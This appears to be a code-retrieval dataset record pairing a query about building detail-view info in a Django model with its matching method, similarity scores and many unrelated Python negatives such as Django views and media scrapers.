[ "0.6594911", "0.6500587", "0.64386666", "0.6242125", "0.61695975", "0.6073596", "0.6034584", "0.6016744", "0.5995429", "0.5982109", "0.59196234", "0.59027016", "0.5872902", "0.5864931", "0.5819785", "0.57872105", "0.57864594", "0.5785509", "0.57692075", "0.57690203", "0.5769016", "0.5755618", "0.5755457", "0.57506853", "0.57424843", "0.5735105", "0.57218677", "0.57147187", "0.57125026", "0.5671116", "0.5667065", "0.5658565", "0.5655856", "0.56346446", "0.5631911", "0.5604624", "0.5602374", "0.5602374", "0.56000483", "0.55884373", "0.5587949", "0.55709344", "0.55704844", "0.55689543", "0.55562943", "0.55536973", "0.5542364", "0.55409074", "0.5520364", "0.5498803", "0.549003", "0.5484697", "0.5471317", "0.5470154", "0.54678786", "0.5466641", "0.5466189", "0.5465589", "0.5452976", "0.54508084", "0.5448896", "0.54434335", "0.54354554", "0.5433669", "0.5429221", "0.5427723", "0.54254407", "0.5425401", "0.5415257", "0.5410847", "0.54044014", "0.5402905", "0.53672206", "0.5364117", "0.5358303", "0.5357674", "0.53528655", "0.53490794", "0.53484917", "0.53300107", "0.5319767", "0.53061706", "0.52984834", "0.52909595", "0.52825433", "0.52753127", "0.52713215", "0.52696407", "0.5266115", "0.5261455", "0.5258895", "0.5253989", "0.5251631", "0.5244559", "0.52429914", "0.52395797", "0.5238291", "0.5235015", "0.52341473", "0.5226157", "0.52255607" ]
0.0
-1
Return more detailed info for the detail view in VotoStudio's workshop.
def get_detail_info(self): detail_descriptors = getattr(self, 'detail_descriptors', None) if not detail_descriptors: raise AttributeError(f"Please add the 'detail_descriptors' field to the model '{self._meta.label}'") detail_values = [{ 'name': d, 'value': getattr(self, d), 'type': 'basic', } for d in detail_descriptors['basic']] related_descriptors = detail_descriptors['related'] for related_descriptor in related_descriptors: field_name = related_descriptor['field'] field = self._meta.get_field(field_name) field_value = getattr(self, field_name) # If this field on the instance # has a value then check its type. if field: field_type = field.get_internal_type() value = None if field_type == 'ManyToManyField': value = [[{ 'name': attr, 'value': getattr(o, attr) } for attr in ('id', *related_descriptor['attrs'])] for o in field_value.all()] if field_type == 'ForeignKey' or field_type == 'OneToOneField': value = [{ 'name': attr, 'value': getattr(field_value, attr, None), } for attr in related_descriptor['attrs']] detail_values.append({ 'name': field_name, 'model_label': field.related_model._meta.label, 'value': value, 'type': 'related', }) return detail_values
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_details(self):", "def print_details(self):\n self.view.print_details()", "def detail(self):\n info = self.info()\n return info", "def get_details(self):\n return self.details", "def get_details(self):\n return self.details", "def get_details(self):\n return self.details", "def details(request, product_id):\n product_details = get_object_or_404(Products, pk=product_id)\n nutriments = Nutriments_for_100g.objects.filter(product__id=product_id).order_by('name')\n context = {\n 'product_details': product_details,\n 'nutriments': nutriments\n }\n return render(request, 'store/details.html', context)", "def details_view(self):\n return_url = get_redirect_target() or self.get_url('.index_view')\n\n if not self.can_view_details:\n return redirect(return_url)\n\n id = get_mdict_item_or_list(request.args, 'id')\n if id is None:\n return redirect(return_url)\n\n model = self.get_one(id)\n\n if model is None:\n flash(gettext('Record does not exist.'), 'error')\n\n if self.details_modal and request.args.get('modal'):\n template = self.details_modal_template\n else:\n template = self.details_template\n\n relationship_views = []\n for relationship in self.model_relationship_views:\n relationship_view = self.model_relationship_views[relationship]\n bp = relationship_view.blueprint\n endpoint = '{}.ajax_config'.format(relationship_view.blueprint.name)\n data = {\n 'field': relationship,\n 'title': relationship_view.title,\n 'config_url': self.get_url(endpoint, model_id=id)\n }\n relationship_views.append(data)\n\n return self.render(\n template,\n model=model,\n details_columns=self._details_columns,\n get_value=self.get_detail_value,\n relationship_views=relationship_views,\n return_url=return_url\n )", "def on_detail(self, request, board_id):\n detailed_info = {\n 'creator': self.redis.get('creator:board:' + board_id).decode('utf-8'),\n 'text': self.redis.get('board:' + board_id).decode('utf-8'),\n 'time': self.redis.get('time:board:' + board_id).decode('utf-8'),\n 'board_id': board_id\n }\n return self.render_template('details.html', detailed_info=detailed_info, comments=self.get_comments(board_id))", "def detail(request, pk):\n mineral = get_object_or_404(Mineral, pk=pk)\n return render(request, 'detail.html', {'mineral': mineral})", "def GET_details(self, article):\r\n return DetailsPage(link = article).render()", "def product_details(request, pk):\n\n products = get_object_or_404(Product, pk=pk)\n product_creator = products.prod_creator_id\n return render(request, 'productdetails.html',\n {'products': products, 'pk': pk,\n 'product_creator': product_creator})", "def details(self):\n pass", "def detail_template(self):\n return '{}/{}.html'.format(self.object_name, self.detail_endpoint)", "def detail(request, target_id):\n temp_values = {\n \"subscroll\":True,\n }\n return render(request, 'server/detail.html', temp_values)", "def item_detail_view_service(self, item_info, connection):\n item_dao = ItemDao()\n item_detail_view = item_dao.item_detail_view_dao(item_info, connection)\n item_detail_view['images'] = item_dao.item_detail_image_dao(item_info, connection)\n item_detail_view['amenities'] = item_dao.item_detail_view_amenitie_dao(item_info,connection)\n item_detail_view['review'] = item_dao.item_detail_view_review_dao(item_info, connection)\n item_detail_view['review_avg'] = item_dao.detail_count_avg_review_dao(item_info, connection)\n\n return {'data' : item_detail_view}", "def detail_view(self, request, pk):\n instance = self.get_object()\n if self.revision_wanted is not None:\n 
instance = get_object_or_404(\n instance.revisions, id=self.revision_wanted).as_page_object()\n elif self.is_preview:\n instance = instance.get_latest_revision_as_page()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)", "def detail(): \n\n # get contentid\n content_id = request.args.get('contentid')\n\n # get shortest places\n title, places = get_shortest(content_id)\n print(content_id)\n\n return render_template('detail.html', \n title=title,\n content_id=content_id,\n places=places, \n count=len(places))", "def details(request):\n\treturn render(request, 'ExcelApp/main.html')", "def GetDetailsItem(self):\r\n if self.details: return self.details.GetDetailsItem()\r\n return None", "def get_details(self):\n print(self.name)\n print(10 * \"-\" + \"\\n\")\n print(self.description)\n for direction in self.linked_rooms:\n room = self.linked_rooms[direction]\n print(\"The \" + room.get_name() + \" is \" + direction)\n print(\"\\n\")", "def details(self) -> Optional[pulumi.Input['SolutionDetailsArgs']]:\n return pulumi.get(self, \"details\")", "def item_details(request, product_id):\n\n item = get_object_or_404(Product, pk=product_id)\n\n context = {\n 'product': item,\n }\n\n return render(request, 'products/item_details.html', context)", "def tool_details(request, tool_name, tool_version):\n context = {\n \"tool\": Tool.objects.order_by(\"-date_posted\").filter(\n title=tool_name, version=tool_version\n )[0]\n }\n return render(request, \"tools/tool_details.html\", context)", "def details(self):\n return self._details", "def print_details(self):\n print(\"[{}]\".format(self.name))\n print(\"ID: \" + str(self.id))\n print(\"name: %s\" % self.name)\n print(\"URL: %s\" % self.url)\n print(\"CPUs: \" + str(self.cpus) + \" cores\")\n print(\"Mem: \" + self.memory_str)\n print(\"Tasks: \" + str(self.tasks_len))\n print(\"Uptime %s\" + self.uptime)\n print(\"Uptime Descriptive %s\" + self.uptime_descriptive)\n print(\" \")", "def team_details(request, id):\n template = loader.get_template('team/details.html')\n\n try:\n team = Team.objects.get(pk=id)\n team_members = User.objects.filter(profile__team=team)\n\n context = {\n 'team_name': team.name,\n 'team_info': team.information,\n 'team_logo': team.logo,\n 'team_members': team_members,\n 'days': Information.getDaysToContest()\n }\n\n except Team.DoesNotExist:\n context = None\n\n return CustomHttpResponse.send(template, context, request)", "def action_show_subcontract_details(self):\n moves = self.move_orig_ids.production_id.move_raw_ids\n tree_view = self.env.ref('mrp_subcontracting.mrp_subcontracting_move_tree_view')\n form_view = self.env.ref('mrp_subcontracting.mrp_subcontracting_move_form_view')\n return {\n 'name': _('Raw Materials for %s') % (self.product_id.display_name),\n 'type': 'ir.actions.act_window',\n 'res_model': 'stock.move',\n 'views': [(tree_view.id, 'tree'), (form_view.id, 'form')],\n 'target': 'current',\n 'domain': [('id', 'in', moves.ids)],\n }", "def product_details(self) -> MqexsProductDetails:\n return self.__product_details", "def snippetDetail(requeset, pk, format = None):", "def detail(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'polls/details.html', {'question': question})", "def getShowDetails(self):\n searchURL = \"http://api.tvmaze.com/shows/\" + str(self.__showID) \\\n + \"?embed=cast\"\n\n response = requests.get(searchURL)\n data = response.json()\n\n self.__detailsJSON = self.parseShowDetails(data)", "def 
product_details(self):\n return self._product_details", "def detail(request, question_id):\n question = get_object_or_404(Question, pk=question_id)\n return render(request, 'problemfinder/details.html', {'question': question})", "def detailedInfo(cls):\n return 'tbd'", "def detailedInfo(cls):\n return 'tbd'", "def enable_details(self):\n self.cs.detail = True", "def detail(request, slug):\n\tarticle = get_object_or_404(Article, slug__exact=slug)\n\tcontext = {\n\t\t'article': article\n\t}\n\ttemplate = 'articles/detail.html'\n\treturn render(request, template, context)", "def printDetails(self):\n print str(self.number) + \": \" + self.title\n print \"URL: \" + self.URL\n print \"domain: \" + self.domain\n print \"score: \" + str(self.score) + \" points\"\n print \"submitted by: \" + self.submitter\n print \"# of comments: \" + str(self.commentCount)\n print \"'discuss' URL: \" + self.commentsURL\n print \"HN ID: \" + str(self.id)\n print \" \"", "def get_details(self, psvm):\n return self.get(psvm)", "def get_show_info(self, id, **kwargs):\n kwargs['id'] = id\n return self.get('info/show.json', **kwargs)", "def detail(request, reachcode):\n lake = get_object_or_404(Lake, reachcode=reachcode)\n photos = Photo.objects.filter(lake=lake)\n documents = Document.objects.filter(lake=lake)\n plants = lake.plants.all()\n return render(request, \"lakes/detail.html\", {\n \"lake\": lake,\n \"photos\": photos,\n \"documents\": documents,\n \"plants\": plants,\n })", "def tourdetails(request):\n\n context = {}\n\n return render(request, 'tourDetails.html', context=context)", "def doc_details(id):\n doctor = get_doctor_detail(id)\n\n location = doctor[\"location\"][\"city\"]\n print(f\"getting similar doctors in {location}\")\n category = doctor[\"categories\"][0][\"alias\"]\n category_name = doctor[\"categories\"][0][\"title\"]\n similar_doctors = get_doctors(\"doctors\", location=location, category=category)\n return render_template(\"about.html\",\n doctor=doctor, \n category=category, \n category_name=category_name, \n list_doctors_info=similar_doctors,\n location=location\n )", "def subscriber_detail(self):\n model_name = Subscriber._meta.object_name.lower()\n app_label = self._meta.app_label\n link = '/admin/%s/%s/' % (app_label, model_name)\n link += '?campaign__id=%d' % self.id\n display_link = _(\"<a href='%(link)s'>%(name)s</a>\") % \\\n {'link': link, 'name': _('details')}\n return display_link", "def view_details_complete():\n curItem = complete_tereeview.focus().strip('#')\n\n with open(\"images_url_dict.json\", \"r\") as images_dict_fo_complete:\n imgs_dict = json.load(images_dict_fo_complete)\n name = \"-\".join(curItem.lower().split())\n\n url, title, ID = imgs_dict[name]\n\n webbrowser.open_new_tab(\"https://eztv.io/shows/{}/{}/\".format(ID, title))", "def action_show_details(self):\n self.ensure_one()\n if self.is_subcontract:\n rounding = self.product_uom.rounding\n production = self.move_orig_ids.production_id\n if self._has_tracked_subcontract_components() and\\\n float_compare(production.qty_produced, production.product_uom_qty, precision_rounding=rounding) < 0 and\\\n float_compare(self.quantity_done, self.product_uom_qty, precision_rounding=rounding) < 0:\n return self._action_record_components()\n action = super(StockMove, self).action_show_details()\n if self.is_subcontract and self._has_tracked_subcontract_components():\n action['views'] = [(self.env.ref('stock.view_stock_move_operations').id, 'form')]\n action['context'].update({\n 'show_lots_m2o': self.has_tracking != 
'none',\n 'show_lots_text': False,\n })\n return action", "def details(self):\n print \"ABC - Deployer.details()\"", "def detail(self):\n url = '/question/%d' % self.id\n d = req.get(url)\n return parser.detail(d)", "def details(self):\n raise NotImplementedError()", "def view_details_wishlist():\n try:\n curItem = wishlist_treeview.focus().strip('#')\n\n with open(\"images_url_dict.json\", \"r\") as images_dict_fo_complete:\n imgs_dict = json.load(images_dict_fo_complete)\n name = \"-\".join(curItem.lower().split())\n\n _, title, ID = imgs_dict[name]\n\n webbrowser.open_new_tab(\"https://eztv.io/shows/{}/{}/\".format(ID, title))\n except KeyError:\n print(\"Failed to use series list\")\n\n webbrowser.open_new_tab(\"https://www.imdb.com/find?ref_=nv_sr_fn&q={}&s=tt\".format(curItem))", "def detail(model_id: str = typer.Argument(..., help='Model ID')):\n with requests.get(f'{app_settings.api_v1_prefix}/model/{model_id}') as r:\n data = r.json()\n model_detailed_view(MLModel.parse_obj(data))", "def __showDetails(self):\n self.buttonBox.button(QDialogButtonBox.Close).setEnabled(False)\n self.buttonBox.button(QDialogButtonBox.Cancel).setEnabled(True)\n self.buttonBox.button(QDialogButtonBox.Cancel).setDefault(True)\n self.__showDetailsButton.setEnabled(False)\n QApplication.setOverrideCursor(Qt.WaitCursor)\n QApplication.processEvents(QEventLoop.ExcludeUserInputEvents)\n \n self.__detailsData = {}\n \n itm = self.resultList.selectedItems()[0]\n packageVersions = itm.data(0, self.VersionRole)\n if len(packageVersions) == 1:\n packageVersion = packageVersions[0]\n elif len(packageVersions) == 0:\n packageVersion = \"\"\n else:\n packageVersion, ok = QInputDialog.getItem(\n self,\n self.tr(\"Show Package Details\"),\n self.tr(\"Select the package version:\"),\n packageVersions,\n 0, False)\n if not ok:\n return\n \n packageName = itm.text(0)\n self.__client.call(\n \"release_data\",\n (packageName, packageVersion),\n lambda d: self.__getPackageDownloadsData(packageVersion, d),\n self.__detailsError\n )", "def movie_info(self, **kwargs):\n\n path = self._get_movie_id_path('details')\n resp = self._get_method(path, kwargs)\n return resp", "def detail(request, location_id):\n location = get_object_or_404(Location, pk=location_id)\n\n return render(request, \"locations/detail.html\", context=fill_context({\"location\": location}))", "def get_item_detail(item_id):\n pass", "def show_recipe_details(id):\n if not g.user:\n flash(\"Please login to view.\",\"warning\")\n return redirect('/login')\n\n \n recipe = get_recipe(id)\n print(recipe['instructions'])\n \n return render_template(\"recipes/detail.html\", recipe=recipe)", "def detail(self, req):\n return self.index(req)", "def details(self, identifier):\n return self.client.request_with_method(Methods.GET % (self.name, identifier,))['item']", "def get_shop_info(request, slug):\n try:\n shop_info = Shop.objects.get(slug=slug)\n data_obj = {\n \"shop_name\": shop_info.title,\n \"logo\": shop_info.logo.url if shop_info.logo else \"\",\n \"tags\": shop_info.categories if shop_info.categories else [],\n \"slug\": shop_info.slug,\n \"id\": shop_info.id\n }\n return Response(data={\"shop_info\": data_obj}, status=status.HTTP_200_OK)\n\n except shop_info.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)", "def portfolio_detail():\n return render_template('portfolio/portfolio.html')", "def details(self, identifier):\n return self.client.request_with_method(Methods.GET % (self.name, identifier,))", "def detail_view(request):\n id_ = 
request.GET['id']\n detail = BikeDetails.objects.get(id=id_)\n data = {'reg_no': detail.bike_reg_no, 'model': detail.bike_model, 'km_driven': detail.km_driven, 'top_speed': detail.top_speed, 'milege': detail.milege, 'fuel_capacity': detail.fuel_tank_capacity, 'max_power': detail.max_power,'image': detail.image}\n return render(request, 'bike_detail.html', data)", "def quick_info_retrieve_view(request):\n kind_of_ballot_item = request.GET.get('kind_of_ballot_item', \"\")\n ballot_item_we_vote_id = request.GET.get('ballot_item_we_vote_id', \"\")\n return quick_info_retrieve_for_api(kind_of_ballot_item=kind_of_ballot_item,\n ballot_item_we_vote_id=ballot_item_we_vote_id)", "def _get_details(self, details):\n details['DoT'] = \"Yes\" if self.static else \"No\"\n details['device'] = self.device\n details['volume_id'] = self.volume_id\n details['from_snap'] = \"No\" if not self.from_snapshot_id else self.from_snapshot_id\n details['from_archive'] = \"No\" if not self.from_archive else self.from_archive['url']\n details['snapshot_progress'] = self.snapshot_progress\n details['snapshot_status'] = self.snapshot_status\n # TODO: keep track of any errors\n details['err_msg'] = None if details.get('err_msg', '') == '' else details['err_msg']\n details['snapshots_created'] = self.snapshots_created\n return details", "def as_detail_html(instance, title=None):\n node = ModelDetailNode(instance)\n return node.render(Context({'title':title}))", "def get_product_details(self):\n\n db.execute(\"SELECT * FROM Product WHERE id = %s\", (self.id,))\n product = db.fetch()\n\n self.name = product[1]\n self.brand = product[2]\n self.nutriscore_id = product[3]\n self.store = product[4]\n self.description = product[5]\n self.url = product[6]", "def case_detail_view(request, pk):\n issue = _get_issue(request, pk)\n tenancy = _get_tenancy(issue)\n notes = _get_issue_notes(request, pk)\n context = {\n \"issue\": IssueDetailSerializer(issue).data,\n \"tenancy\": TenancySerializer(tenancy).data,\n \"notes\": IssueNoteSerializer(notes, many=True).data,\n \"details\": _get_submitted_details(issue),\n \"actionstep_url\": _get_actionstep_url(issue),\n \"urls\": get_detail_urls(issue),\n \"permissions\": {\n \"is_paralegal_or_better\": request.user.is_paralegal_or_better,\n \"is_coordinator_or_better\": request.user.is_coordinator_or_better,\n },\n }\n return render_react_page(request, f\"Case {issue.fileref}\", \"case-detail\", context)", "def plante_info(id):\n plante = get_plante(id)\n return render_template(\n \"plante-info.html\",\n plante = plante,\n title = plante.get_name(),\n parterre = get_parterre(plante.get_parterre()))", "def student_view_data(self, context=None):\n return {\n 'title': self.title,\n 'description': self.description,\n 'embed_code': self.embed_code,\n 'highres_url': self.highres_url,\n 'lowres_url': self.lowres_url,\n }", "def details_window(self, instance: Union[Nobleman, Location]):\n window = tk.Toplevel()\n window.title(instance.name)\n window.protocol(\"WM_DELETE_WINDOW\",\n partial(self.close_details_window, instance))\n self.register_extra_window(instance, window)\n self.generate_window_content(instance, window)", "def get_show_information():\n\n #getting the guidebox_id variable from show_page.html\n guidebox_id = request.args.get(\"guidebox_id\")\n\n #get the show from the database\n show = Show.find_show_with_guidebox_id(guidebox_id)\n\n #check if show has a description, if it does then just pass the show on\n if show.description and show.network:\n print \"\\n\\n\\nShow description and 
network in database.\\n\\n\\n\"\n #if not, call API to get the show description, add description to show information in the database\n\n else:\n #API call to get the show information\n show_data = guidebox_show_info(guidebox_id)\n \n #add show description to table\n Show.add_description_network_to_show(show, show_data)\n print \"\\n\\n\\nAdded show description and network to the database.\\n\\n\\n\"\n \n\n show_info = Show.find_show_with_guidebox_id(guidebox_id)\n\n return jsonify(show_info.as_dict())", "def mineral_detail(request, pk):\n selected_mineral = get_object_or_404(Mineral, id=pk)\n return render(request,\n 'detail.html',\n {'mineral': selected_mineral})", "def movie_details(movie_id):\n\n movie = crud.get_movie_by_id(movie_id)\n\n return render_template('movie_details.html', movie=movie)", "def getDetailsJSON(self):\n return self.__detailsJSON", "def get_details(self):\n # The basic details are put sussed out by our super class\n # method and put in 'self.xml_details'\n #\n super(Movie, self).get_details()\n\n # And now we get the rest of the details\n #\n self.year = ''\n self.certifications = []\n self.runtime = None\n self.rating = None\n self.votes = None\n self.genres = []\n self.directors = []\n self.writers = []\n self.studio = ''\n self.outline = ''\n self.plot = ''\n self.fanart = [] # List of URLs of fanart images.\n self.posters = [] # List of URLs of poster images.\n self.trailers = [] # List of URLs of trailers.\n\n # This is the list ScrapeURL's that represent custom functions\n # of further data to lookup. These, in turn, when parsed, may\n # in turn yield more custom functions to lookup more data.\n #\n self.urls = []\n \n # Further lookups for this item may only give us partial URL's\n # We take the first lookup detail link's url and use that as a\n # base url for further lookups.\n #\n self.base_url = self.links[0].url\n\n # And here we parse the information that was in the XML response the\n # parser gave us.\n #\n dom = parseString(self.xml_details)\n ep = dom.firstChild\n\n self.id = get_child_data(ep, \"id\", self.id)\n self.title = get_child_data(ep, \"title\", self.title)\n self.year = try_int(get_child_data(ep, \"year\"))\n\n certification = first_child(ep, \"certification\")\n while certification:\n self.certifications.append(certification.firstChild.data)\n certification = next_sibling(certification, \"certification\")\n\n self.runtime = get_child_data(ep, \"runtime\")\n self.rating = try_float(get_child_data(ep, \"rating\"))\n self.votes = try_int(get_child_data(ep, \"votes\"))\n\n genre = first_child(ep, \"genre\")\n while genre:\n self.genres.append(genre.firstChild.data)\n genre = next_sibling(genre, \"genre\")\n\n self.studio = get_child_data(ep, \"studio\", \"\")\n self.outline = get_child_data(ep, \"outline\", \"\")\n self.plot = get_child_data(ep, \"plot\", \"\")\n\n # Now we are done with the 'simple' stuff out of the XML response\n # we got from the parser. Next we loop through any \"custom function\"\n # URL's. These are recursive, and may also invoke back functions\n # on this movie object to fill in even more specific nested information.\n #\n url = first_child(ep, \"url\")\n while url:\n self.urls.append(ScrapeURL(url, cache = self.scraper.cache,\n base_url = self.base_url))\n url = next_sibling(url, \"url\")\n\n # At this point we are finished parsing with this dom. minidom says we\n # should still unlink it to be sure for it to be able to be GC'd. 
Ug.\n #\n ep = None\n dom.unlink()\n dom = None\n\n # XXX I am not sure there is any reason to store these URL's.\n # in the above loop perhaps we should just directly invoke\n # the parser on every URL as we come across it.\n #\n for url in self.urls:\n self.scraper.custom_function(url, self)\n \n return", "def ProfService_detail(request, pk):\n ProfService = get_object_or_404(PServices, pk=pk)\n \n return render(request, \"ProfService_detail.html\", {\"ProfService\": ProfService})", "def detailed(self, todo):\n rv = self.compact_multiple([todo])\n if todo.description:\n rv = \"{}\\n\\nDescription: {}\".format(rv, todo.description)\n if todo.location:\n rv = \"{}\\n\\nLocation: {}\".format(rv, todo.location)\n return rv", "def show_catalogue(self):\n\n data = cur.execute(\"\"\"SELECT productid, productname, unitcost, stock, location \n FROM catalogue WHERE vendorname = ?\"\"\", (self.vendorname,)).fetchall()\n print(tabulate(data, headers=[\"Product ID\", \"Name\", \"Unit Cost\", \"Stock\", \"Location\"]))", "def get_details(self):\n # The basic details are put sussed out by our super class\n # method and put in 'self.xml_details'\n #\n super(Series, self).get_details()\n # And now we get the rest of the details\n #\n self.premiered = None\n self.rating = None\n self.plot = ''\n self.genres = []\n self.thumbs = []\n self.fanart = []\n self.episode_guide_urls = []\n self.episodes = None\n\n # Further lookups for this item may only give us partial URL's\n # We take the first lookup detail link's url and use that as a\n # base url for further lookups.\n #\n self.base_url = self.links[0].url\n\n dom = parseString(self.xml_details)\n ep = dom.firstChild\n\n self.title = get_child_data(ep, \"title\", self.title)\n self.plot = get_child_data(ep, \"plot\", \"\")\n self.premiered = get_child_data(ep, \"premiered\")\n self.rating = try_float(get_child_data(ep, \"rating\"))\n\n genre = first_child(ep, \"genre\")\n while genre:\n if genre.firstChild and len(genre.firstChild.data) > 0:\n self.genres.append(genre.firstChild.data)\n genre = next_sibling(genre, \"genre\")\n\n # Thumbs have not only url's, but they can have informative attributes\n # so we store this data all as a Dict.. it will always at least have\n # the 'url' key.\n #\n thumbs = first_child(ep, \"thumbs\")\n if thumbs:\n thumb = first_child(thumbs, \"thumb\")\n while thumb:\n td = { \"url\" : thumb.firstChild.data }\n attrs = thumb.attributes\n for i in range(0,attrs.length):\n attr = attrs.item(i)\n td[attr.name] = attr.value\n self.thumbs.append(td)\n thumb = next_sibling(thumb, \"thumb\")\n\n fanart = first_child(ep, \"fanart\")\n if fanart:\n # The 'url' attribute of the <fanart> tag is the base url for the\n # poster images and their previews. 
We do not store that, we just\n # construct the full urls.\n #\n url_base = fanart.getAttribute(\"url\")\n\n self.fanart = []\n\n thumb = first_child(fanart, \"thumb\")\n while thumb:\n self.fanart.append(url_base + thumb.firstChild.data)\n thumb = next_sibling(thumb, \"thumb\")\n\n episodeguide = first_child(ep, \"episodeguide\")\n if episodeguide:\n url = first_child(episodeguide, \"url\")\n while url:\n self.episode_guide_urls.append(\\\n ScrapeURL(url,cache = self.scraper.cache,\n base_url = self.base_url))\n url = next_sibling(url, \"url\")\n\n # And at this point we have parsed out all of the series specific\n # data from our XML response, and also got a handle on where to get\n # the episode information.\n #\n dom.unlink()\n dom = None\n return", "def detail(request, slug, template='contacts/person/detail.html'):\n\n if not request.user.is_authenticated():\n return HttpResponseRedirect('/login/?next=%s' % request.path)\n\n try:\n person = Person.objects.get(slug__iexact=slug)\n\n if not request.session:\n request.session={}\n\n viewed_list = request.session.get('viewed',[])\n if person in viewed_list:\n viewed_list.remove(person)\n viewed_list.insert(0,person) # d'aquesta manera estara al final\n del viewed_list[8:10] # eliminam si hi ha moltes\n request.session['viewed'] = viewed_list\n\n except Person.DoesNotExist:\n raise Http404\n\n kwvars = {\n 'object': person,\n }\n\n return render_to_response(template, kwvars, RequestContext(request))", "def show_info(self):\n txt = \"Brand: %s\\nModel: %s\\nHostname: %s\\n\"%(self.brand, self.model, self.hostname)\n return txt", "def fetch_show_information (self, id, type):\n # check if we have a show or a movie, the request made depends on this\n if type == 'show':\n paths = [\n ['videos', id, ['requestId', 'regularSynopsis', 'evidence']],\n ['videos', id, 'seasonList', 'current', 'summary']\n ]\n else:\n paths = [['videos', id, ['requestId', 'regularSynopsis', 'evidence']]]\n response = self._path_request(paths=paths)\n return self._process_response(response=response, component='Show information')", "def news_detail(request, pk, slug=None):\n item = get_object_or_404(models.NewsItem.objects, pk=pk)\n\n return render(request, 'news/detail.html', {\n 'object': item,\n })", "def service_details(request, service_id):\n\n service = get_object_or_404(Service, pk=service_id)\n creator_profile = UserProfile.objects.all()\n\n template = 'services/service-details.html'\n context = {\n 'service': service,\n 'creator_profile': creator_profile,\n }\n\n return render(request, template, context)", "def callback_Details(mod, currentMods, window):\n detailMod = currentMods[mod]\n detailText = brf.print_Details(mod, currentMods)\n sg.popup(detailText)\n # window['detailText'].update('Details for {}:\\n{}'.format(mod, detailText))\n\n return None", "def get_details(self):\n raise Exception(\"bad details\")", "def detail(request, article_id):\n return render(request, 'knowledgebase/detail.html', {'article_id': article_id})", "def detail_speaker(request, pk, slug, template=\"core/detail_speaker.html\"):\n try:\n speaker = Speaker.objects.get(pk=pk, slug=slug)\n except Speaker.DoesNotExist:\n raise Http404(_(u'Houve algum problema tentando obter o palestrate! 
Você tem certeza de que ele existe?'))\n\n response = { 'speaker': speaker, 'show_all_info': True }\n return direct_to_template(request, template, response)", "def info(self, id):", "def GetBasicInformation(self):\n if self.cur_uid is None:\n return\n self._get_product_detail_id()", "def location_details(self, **kwargs):\n \n self.options.update(kwargs)\n self.options['action'] = 'locator.location.details'\n return self.call(self.options)", "def show_details(self):\n self.close_button.pack_forget()\n self.timer = 11\n\n DetailScreen(self.master, self.detail_frame, self.user)", "def get_detail(self, appid):\n item = {}\n detail = self.details(appid)\n if not detail.docV2.docid:\n raise AppNotFoundError(appid)\n item[\"appid\"] = appid\n item[\"version_code\"] = detail.docV2.details.appDetails.versionCode\n item[\"offer_type\"] = detail.docV2.offer[0].offerType\n category = detail.docV2.details.appDetails.appCategory[0]\n item[\"category_id\"] = CATEGORY_MAP[category]\n item[\"description\"] = detail.docV2.descriptionHtml\n # detect the string language from description, return ISO 639-1 language code.\n item[\"lang\"] = unicode(guess_language(item[\"description\"] or 'en'))\n item[\"developer\"] = detail.docV2.details.appDetails.developerName\n item[\"group\"] = GROUP_MAP.get(detail.docV2.details.appDetails.appType) or 'app'\n item[\"icon\"] = [img.imageUrl for img in detail.docV2.image if img.imageType == 4][0]\n item[\"is_deleted\"] = False\n item[\"name\"] = detail.docV2.title\n # for url seo\n name = re.sub(ur\"\"\"\\$|\\%|\\(|\\)|\\[|\\[|\\]|\\*|\\ |\\®|\\#|\\~|\\`|\\@|\\^|\\&|\\{|\\}|\\<|\\>|\\?|\\\"|\\'|\\’|\\–|\\:|\\;|\\||\\/|\\+|\\!|\\•|\\,|\\™|\\_|\\.\"\"\", '-', item['name'])\n name_url = urllib.quote(name.encode('utf-8'))\n if \"%\" not in name_url:\n item['name_url'] = name_url\n item[\"operating_systems\"] = \"\"\n item[\"order\"] = 0\n item[\"rating\"] = detail.docV2.aggregateRating.starRating\n item['rating_user'] = humanize.intcomma(detail.docV2.aggregateRating.ratingsCount)\n\n total_count = detail.docV2.details.appDetails.numDownloads\n item[\"total_count\"] = remove_downloads(total_count)\n item[\"download_count\"] = strCount_to_intCount(total_count)\n\n item[\"release_time\"] = detail.docV2.details.appDetails.uploadDate\n item[\"screenshot\"] = [img.imageUrl for img in detail.docV2.image if img.imageType == 1]\n item[\"update_info\"] = detail.docV2.details.appDetails.recentChangesHtml\n item[\"version\"] = detail.docV2.details.appDetails.versionString\n item[\"offer_type\"] = detail.docV2.offer[0].offerType\n item[\"size\"] = humanize.naturalsize(detail.docV2.details.appDetails.installationSize, gnu=True)\n item[\"source\"] = 'crawler'\n item[\"channel\"] = 'googleplay'\n item[\"price\"] = detail.docV2.offer[0].formattedAmount.lower()\n item[\"paid\"] = 1\n item[\"search_order\"] = 0\n item[\"search_reindex\"] = 1\n item['app_status'] = 0\n\n return item", "def reservation_details():\n session_id = request.args.get('session-id', None)\n user_id = request.args.get('user-id', None)\n reservation_id = request.args.get('reservation-id', None)\n reservation = get_reservation_identified_by_id(reservation_id)\n car = get_car_identified_by_id(reservation.id_car)\n date_from = str(reservation.date_from)\n date_to = str(reservation.date_to)\n total_price = get_total_price(reservation_id)\n if check_authentication(session_id, user_id) and is_reservation_of_the_user(reservation_id, user_id):\n return render_template('car_reservation_details.html', user=user_id, 
session_id=session_id, car=car,\n reservation_id=reservation_id, date_from=date_from,\n date_to=date_to, total_price=total_price)\n else:\n return render_template('home.html', cars_list=get_cars_preview(), news_list=get_news_list(), authjs=False,\n preview_length=get_cars_preview().__len__(), del_session_cookie=True)", "def detail(self):\n return self.status[\"health\"][\"detail\"]", "def show_research(self):\n self.list_research = orm_imp.read_research()\n print(\"========================================================\")\n for row in self.list_research:\n print(\n row[\"date\"], \"|| Produit :\", row['subcat'],\n \"|| Meilleure proposition :\", row['product'], \"| Score :\",\n row['nutriscore'], \"| Lien :\", row['url'],\n \"| Ingrédients :\", row['ingredient'])\n print(\"========================================================\")", "def details(self, packageName, get_raw=False):\n path = \"details?doc=%s\" % requests.utils.quote(packageName)\n raw_response = self.execute_request_raw(path)\n message = self.executeRequestApi2(path, raw_response=raw_response)\n if get_raw:\n return message.payload.detailsResponse, raw_response\n return message.payload.detailsResponse", "def details(self) -> \"dict\":\n return self._attrs.get(\"details\")", "def product_detail(request, product_id):\n\n all_products = Product.objects.filter(is_holiday=False)\n product = get_object_or_404(all_products, pk=product_id)\n\n context = {\n 'product': product,\n 